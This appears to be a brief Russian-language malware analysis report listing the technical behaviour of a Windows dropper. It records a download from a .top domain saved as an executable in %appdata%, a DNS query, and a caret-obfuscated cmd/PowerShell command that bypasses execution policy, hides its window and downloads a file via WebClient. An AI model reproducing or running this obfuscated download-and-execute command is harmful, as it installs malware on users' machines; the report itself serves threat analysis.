Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^We^r^ShEl^l^.^EX^e ^-eXECUti^O^N^pOliCY^ ^BypasS^ -NOPro^fiL^E -W^INDowSt^yl^e^ HI^D^DEn ^(neW^-obj^E^ct s^YSTE^M.Net.WEB^C^L^ieNt)^.^dow^NLo^a^DfIlE(^'http://vvorootad.to...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "P^O^We^r^ShEl^l^.^EX^e ^-eXECUti^O^N^pOliCY^ ^BypasS^ -NOPro^fiL^E -W^INDowSt^yl^e^ HI^D^DEn ^(neW^-obj^E^ct s^YSTE^M.Net.WEB^C^L^ieNt)^.^dow^NLo^a^DfIlE(^'http://vvorootad.to...' (со скрытым окном)